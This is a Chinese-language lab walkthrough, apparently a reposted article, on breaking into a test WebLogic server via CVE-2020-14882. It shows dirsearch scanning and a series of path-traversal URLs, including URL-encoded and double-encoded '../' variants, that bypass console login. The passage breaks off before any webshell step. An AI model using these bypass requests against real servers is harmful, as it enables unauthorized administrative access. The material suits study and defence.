更多黑客技能 公众号:暗网黑客
作者:掌控安全-xiao_yi
0x01 信息收集
打开靶场地址,看到404页面不要慌张,先进行信息收集!
由于是靶场,就进行目录扫描,就不用进行子域名爆破了~
利用dirsearch进行爆破:
python3 dirsearch/dirsearch.py -u "http://172.23.26.66:7001/" -e \*
先访问200页面发现全是空页面,再尝试访问302重定向后的页面,发现了新天地!
发现这是一个WebLogic, 并且有版本号,此时只用百度一下,就发现了该版本存在多个漏洞,最后我将它定位在 CVE-2020-14882
0x02 复现
在读完博客中大佬对该漏洞的复现之后,尝试自己进行复现并拿到webshell。
0#01 权限漏洞绕过
在最初的这个页面,是需要账号和用户名登录才可以进入后台,但是这里可以进行目录的骚操作来进行直接无密码登录后台。
http://172.23.26.66:7001/console/css/../console.portal
这条构造的url表示由于 …/在目录中表示返回上一级目录, 即console这个目录,然后访问该目录下的后台文件
但是运行结果并不像我们像的那样, 还是被重定向到登陆页面
这里就需要一些小技巧进行绕过,用burp的url编码功能对…/进行编码
http://172.23.26.66:7001/console/images/%2E%2E%2Fconsole.portal
结果还是被重定向了
将大写换成小写
http://172.23.26.66:7001/console/images/%2e%2e%2fconsole.portal
无果
再进行一次url编码
http://172.23.26.66:7001/console/images/%252e%252e%252fconsole